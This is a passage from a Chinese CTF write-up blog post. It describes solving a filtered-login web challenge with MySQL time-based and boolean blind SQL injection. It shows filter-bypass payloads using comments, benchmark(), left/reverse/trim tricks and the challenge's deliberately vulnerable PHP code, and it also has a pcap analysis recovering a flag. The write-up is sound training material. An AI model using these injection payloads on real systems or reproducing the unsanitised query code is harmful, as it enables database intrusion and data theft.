<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if((select/**/cast(((select/**/ascii(replace(left(group_concat(table_name),7),&apos;users,&apos;,&apos;&apos;))/**/from/**/sys.schema_table_statistics)/83)/**/as/**/char(1))),benchmark(10000000,md5(1)),1),&apos;111&apos;%23&amp;password=1</div></pre></td></tr></table></figure>
<p>-&gt;延时</p>
<p>判断出users,的下一个表名第一个字符ascii码为70,为大写的F</p>
<p><img src="http://pic.c1imber.top/blog/20210115/qpCjBRQo1pYB.png?imageslim" alt="mark"></p>
<p>后来问了做出这道题的学长，表名其实应该是（SeCrrreT），当时看ascii码是70就延时了，就没往后试了，以为是F</p>
<p>绕过方法2：使用mysql字符串反转函数<code>reverse</code>（由于比赛的时候不能上网，记不起来这个函数名了，所以没有去试该函数是否被过滤了，这里说一下方法）</p>
<p>使用<code>left+reverse</code>组合进行绕过，用法如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select version();</div><div class="line">+-------------------------+</div><div class="line">| version()               |</div><div class="line">+-------------------------+</div><div class="line">| 5.7.32-0ubuntu0.16.04.1 |</div><div class="line">+-------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select reverse(left(version(),2));</div><div class="line">+----------------------------+</div><div class="line">| reverse(left(version(),2)) |</div><div class="line">+----------------------------+</div><div class="line">| .5                         |</div><div class="line">+----------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select ascii(reverse(left(version(),2)));</div><div class="line">+-----------------------------------+</div><div class="line">| ascii(reverse(left(version(),2))) |</div><div class="line">+-----------------------------------+</div><div class="line">|                                46 |</div><div class="line">+-----------------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select reverse(left(version(),3));</div><div class="line">+----------------------------+</div><div class="line">| reverse(left(version(),3)) |</div><div class="line">+----------------------------+</div><div class="line">| 7.5                        |</div><div class="line">+----------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select ascii(reverse(left(version(),3)));</div><div class="line">+-----------------------------------+</div><div class="line">| ascii(reverse(left(version(),3))) |</div><div class="line">+-----------------------------------+</div><div class="line">|                                55 |</div><div class="line">+-----------------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>绕过方法3：<br>赛后和同事交流后发现依旧可以使用<code>trim</code>，用法：<br><code>trim(both &#39;s1&#39; from &#39;s2&#39;)</code> 删除字符串s2两边的s1</p>
<p>只要是字符串删除的方法，均会遇到上面所说的像replace那样的问题，使用<code>left</code>就能解决</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select trim(both &apos;123&apos; from &apos;123123&apos;);</div><div class="line">+--------------------------------+</div><div class="line">| trim(both &apos;123&apos; from &apos;123123&apos;) |</div><div class="line">+--------------------------------+</div><div class="line">|                                |</div><div class="line">+--------------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select trim(both &apos;123&apos; from left(&apos;123123&apos;,4));</div><div class="line">+----------------------------------------+</div><div class="line">| trim(both &apos;123&apos; from left(&apos;123123&apos;,4)) |</div><div class="line">+----------------------------------------+</div><div class="line">| 1                                      |</div><div class="line">+----------------------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>其实也可以不用盲注</p>
<p>知道了系统的用户名为root</p>
<p>按照上面的方法构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;/**/and/**/true%23&amp;password=</div></pre></td></tr></table></figure>
<p>-&gt;响应中存在welcome Admin</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;/**/and/**/false%23&amp;password=</div></pre></td></tr></table></figure>
<p>-&gt;响应中不存在welcome Admin</p>
<p>使用布尔盲注代替时间盲注即可</p>
<p>比赛时这道题最终还是没有做出来，赛后根据这道题目做了个docker环境，题目代码逻辑和过滤关键字如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">include</span>(<span class="string">'config.php'</span>);</div><div class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'username'</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">'password'</span>]))</div><div class="line">&#123;</div><div class="line">    <span class="keyword">if</span>((preg_match(<span class="string">"/sleep|update|extract|in|substr|mid|right|like|regexp|&lt;|=|&gt;|\^|\"|or/i"</span>, $_POST[<span class="string">'username'</span>])) || preg_match(<span class="string">"/sleep|update|extract|in|substr|mid|right|like|regexp|&lt;|=|&gt;|\^|\"|or/i"</span>, $_POST[<span class="string">'password'</span>]))</div><div class="line">    &#123;</div><div class="line">         <span class="keyword">die</span>(<span class="string">"hacker!!!"</span>);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">else</span></div><div class="line">    &#123;</div><div class="line">        $conn=mysqli_connect($dbhost,$dbuser,$dbpasswd,$dbname);</div><div class="line">        $sql=<span class="string">"select * from users where username='"</span>.$_POST[<span class="string">'username'</span>].<span class="string">"' and password='"</span>.$_POST[<span class="string">'password'</span>].<span class="string">"'"</span>;</div><div class="line">        <span class="keyword">echo</span> $sql.<span class="string">"\n\n"</span>;</div><div class="line">        <span class="keyword">if</span>(($result=mysqli_query($conn,$sql)) &amp;&amp; (mysqli_num_rows($result)&gt;<span class="number">0</span>))</div><div class="line">        &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"&lt;h1 color='red'&gt;Welcome,Admin!&lt;/h1&gt;"</span>;</div><div class="line">        &#125;</div><div class="line">        <span class="keyword">else</span></div><div class="line">        &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"Login Error"</span>;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>根据上面的绕过方法编写脚本</p>
<p><img src="http://pic.c1imber.top/blog/20210115/JbC8fLgNRN4R.png?imageslim" alt="mark"></p>
<h3 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h3><p><strong>hackshark</strong></p>
<p>在过滤器当中输入：<code>http.request.method==POST</code></p>
<p>过滤出http POST流量，分析http流量，发现为sql布尔盲注流量，猜测盲注的password字段就是flag</p>
<p>当判断为真时，响应当中会有<code>&lt;img src=&quot;../images/slap.jpg&quot;</code>的内容</p>
<p><img src="http://pic.c1imber.top/blog/20210115/ikcSG2xMkgNl.png?imageslim" alt="mark"></p>
<p>根据响应过滤出相应的内容<br><code>http contains &quot;/images/slap.jpg&quot;</code></p>
<p><img src="http://pic.c1imber.top/blog/20210115/5OifB4TGm6rD.png?imageslim" alt="mark"></p>
<p>追踪http流，获取flag</p>
<p>flag{booool_sqli}</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://c1aysec.github.io">c1ay</a>
            <p>原文链接：<a href="https://c1aysec.github.io/2021/01/15/2020全国电信和互联网行业网络安全竞赛线下个人赛wp/">https://c1aysec.github.io/2021/01/15/2020全国电信和互联网行业网络安全竞赛线下个人赛wp/</a>
            <p>发表日期：<a href="https://c1aysec.github.io/2021/01/15/2020全国电信和互联网行业网络安全竞赛线下个人赛wp/">January 15th 2021, 2:48:40 pm</a>
            <p>更新日期：<a href="https://c1aysec.github.io/2021/01/15/2020全国电信和互联网行业网络安全竞赛线下个人赛wp/">January 15th 2021, 4:00:02 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2021/01/22/Seeyon-OA getshell漏洞复现和payload构造/" title= "Seeyon-OA getshell漏洞复现和payload构造">
                    <div class="nextTitle">Seeyon-OA getshell漏洞复现和payload构造</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2020/12/14/2020网鼎杯总决赛web题/" title= "2020网鼎杯总决赛web题">
                    <div class="prevTitle">2020网鼎杯总决赛web题</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:1372003815@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/mywechat.jpg" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#序"><span class="toc-number">1.</span> <span class="toc-text">序</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web"><span class="toc-number">2.</span> <span class="toc-text">web</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#misc"><span class="toc-number">3.</span> <span class="toc-text">misc</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 62
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/08</span><a class="archive-post-title" href= "/2018/08/08/记一次漏洞组合拳-水平越权+Self XSS漏洞/" >记一次漏洞组合拳-水平越权+Self XSS漏洞</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2022/01/24/RealWorld2022-Hack into Skynet/" >RealWorld2022-Hack into Skynet</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2021 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/19</span><a class="archive-post-title" href= "/2021/11/19/2021 L3HCTF 部分web wp/" >2021 L3HCTF 部分web wp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/19</span><a class="archive-post-title" href= "/2021/10/19/通过2021 ByteCTF double sqli初探clickghouse sqli/" >通过2021 ByteCTF double sqli初探clickghouse sqli</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/15</span><a class="archive-post-title" href= "/2021/03/15/Microsoft Exchange RCE/" >Microsoft Exchange RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/22</span><a class="archive-post-title" href= "/2021/01/22/weblogic cve-2021-2109 jndi注入 远程代码执行复现/" >weblogic cve-2021-2109 jndi注入 远程代码执行复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/22</span><a class="archive-post-title" href= "/2021/01/22/Seeyon-OA getshell漏洞复现和payload构造/" >Seeyon-OA getshell漏洞复现和payload构造</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/14</span><a class="archive-post-title" href= "/2020/12/14/2020网鼎杯总决赛web题/" >2020网鼎杯总决赛web题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/07</span><a class="archive-post-title" href= "/2020/12/07/2020全国电信和互联网行业网络安全竞赛wp/" >2020全国电信和互联网行业网络安全竞赛wp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/02</span><a class="archive-post-title" href= "/2020/11/02/weblogic cve-2020-14882 漏洞复现以及回显方式研究/" >weblogic cve-2020-14882 漏洞复现以及回显方式研究</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/19</span><a class="archive-post-title" href= "/2020/10/19/2020 N1CTF writeup/" >2020 N1CTF writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/31</span><a class="archive-post-title" href= "/2020/08/31/2020GACTF writeup/" >2020GACTF writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/24</span><a class="archive-post-title" href= "/2020/08/24/2020强网杯writeup/" >2020强网杯writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/18</span><a class="archive-post-title" href= "/2020/08/18/深信服EDR RCE分析/" >深信服EDR RCE分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/17</span><a class="archive-post-title" href= "/2020/05/17/2020网鼎杯朱雀组-部分web/" >2020网鼎杯朱雀组-部分web</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/10</span><a class="archive-post-title" href= "/2020/05/10/2020网鼎杯青龙组-php反序列化/" >2020网鼎杯青龙组-php反序列化</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/22</span><a class="archive-post-title" href= "/2020/04/22/通达OA任意用户登录/" >通达OA任意用户登录</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/03</span><a class="archive-post-title" href= "/2019/11/03/ctf记录-记一次有趣的注入/" >ctf记录-记一次有趣的注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/20</span><a class="archive-post-title" href= "/2019/10/20/2019极客巅峰ctf记录/" >2019极客巅峰ctf记录</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/28</span><a class="archive-post-title" href= "/2019/05/28/2019强网杯-过滤select的注入/" >2019强网杯-过滤select的注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/18</span><a class="archive-post-title" href= "/2019/04/18/DDCTF2019 write up/" >DDCTF2019 write up</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/17</span><a class="archive-post-title" href= "/2019/03/17/渗透技巧-使用dnslog加快盲注速度(MSSQL篇)/" >渗透技巧-使用dnslog加快盲注速度(MSSQL篇)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/11</span><a class="archive-post-title" href= "/2019/01/11/记一次dnslog接收异常分析/" >记一次dnslog接收异常分析</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/21</span><a class="archive-post-title" href= "/2018/12/21/phpcms2008 type.php代码执行漏洞/" >phpcms2008 type.php代码执行漏洞分析与复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/30</span><a class="archive-post-title" href= "/2018/11/30/Code-Breaking Puzzles挑战/" >Code-Breaking Puzzles挑战</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/19</span><a class="archive-post-title" href= "/2018/11/19/2018湖湘杯注入题writeup/" >2018湖湘杯注入题writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/19</span><a class="archive-post-title" href= "/2018/08/19/记一次失败漏洞利用的经历--ubuntu下的redis未授权访问漏洞复现/" >记一次失败漏洞利用的经历--ubuntu下的redis未授权访问漏洞复现</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2020/05/25/2020宁波市第三届网络安全大赛-web题writeup/" >2020宁波市第三届网络安全大赛-web题writeup</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/26</span><a class="archive-post-title" href= "/2018/10/26/PHP反序列化漏洞学习-绕过_wakeup()函数/" >PHP反序列化漏洞学习-绕过_wakeup()函数</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/08</span><a class="archive-post-title" href= "/2018/10/08/记一次ctf极限利用-不包含数字字母的webshell/" >记一次ctf极限利用-不包含数字字母的webshell</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/2018/09/07/Ecshop2.x & 3.x版本最新漏洞分析与利用/" >Ecshop2.x注入漏洞&代码执行漏洞分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/02</span><a class="archive-post-title" href= "/2018/09/02/XSS绕过之中文尖括号/" >XSS绕过之中文尖括号</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/2018/08/26/ssrf漏洞学习记录/" >ssrf漏洞学习记录</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/18</span><a class="archive-post-title" href= "/2018/08/18/关于ubuntu和centos cron的一些区别/" >关于ubuntu和centos cron的一些区别</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href= "/2018/08/17/解决ubuntu任务计划写shell失败的问题/" >解决ubuntu任务计划写shell失败的问题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/17</span><a class="archive-post-title" href= "/2018/07/17/Linux下几种反弹shell方法的总结与理解/" >Linux下几种反弹shell方法的总结与理解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/30</span><a class="archive-post-title" href= "/2018/06/30/渗透技巧-使用dnslog加快盲注速度(MYSQL篇)/" >渗透技巧-使用dnslog加快盲注速度(MYSQL篇)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/07</span><a class="archive-post-title" href= "/2018/06/07/upload-labs记录/" >upload-labs记录</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/06</span><a class="archive-post-title" href= "/2018/06/06/python布尔盲注脚本算法完善/" >python布尔盲注脚本算法完善</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/05</span><a class="archive-post-title" href= "/2018/06/05/python编写布尔盲注脚本/" >python编写布尔盲注脚本</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/05</span><a class="archive-post-title" href= "/2018/06/05/python optparse模块学习/" >python optparse模块学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/04</span><a class="archive-post-title" href= "/2018/06/04/python有序二分查找算法学习/" >python有序二分查找算法学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/25</span><a class="archive-post-title" href= "/2018/05/25/ISCC2018 write up/" >ISCC2018 write up</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/13</span><a class="archive-post-title" href= "/2018/05/13/php parse_url()函数在解析url引发的绕过思路/" >php parse_url()函数在解析url引发的绕过思路</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/12</span><a class="archive-post-title" href= "/2018/03/12/N1CTF2018 77777 writeup/" >N1CTF2018 77777 writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/12</span><a class="archive-post-title" href= "/2018/01/12/ARP协议分析以及用python实现一次ARP欺骗/" >ARP协议分析以及用python实现一次ARP欺骗</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2017 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/26</span><a class="archive-post-title" href= "/2017/11/26/湖湘杯2017网络安全技能大赛部分题writeup/" >湖湘杯2017网络安全技能大赛部分题writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/20</span><a class="archive-post-title" href= "/2017/11/20/lctf2017注入题学习记录/" >lctf2017注入题学习记录</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/12</span><a class="archive-post-title" href= "/2017/11/12/mysql报错注入总结与原理分析/" >mysql报错注入总结与原理分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/05</span><a class="archive-post-title" href= "/2017/11/05/Some Words/" >第三届上海市大学生网络安全大赛注入题writeup</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2021/10/21/php反序列化原生类/" >php反序列化原生类</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2021/01/15/2020全国电信和互联网行业网络安全竞赛线下个人赛wp/" >2020全国电信和互联网行业网络安全竞赛线下个人赛wp</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2020/08/08/Apache SkyWalking SQL注入漏洞-CVE-2020-13921/" >Apache SkyWalking SQL注入漏洞-CVE-2020-13921</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2021/12/30/ctf记录记一次简单的命令执行绕过/" >ctf记录记一次简单的命令执行绕过</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/2021/11/23/2021 n1ctf 复盘/" >2021 n1ctf 复盘</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
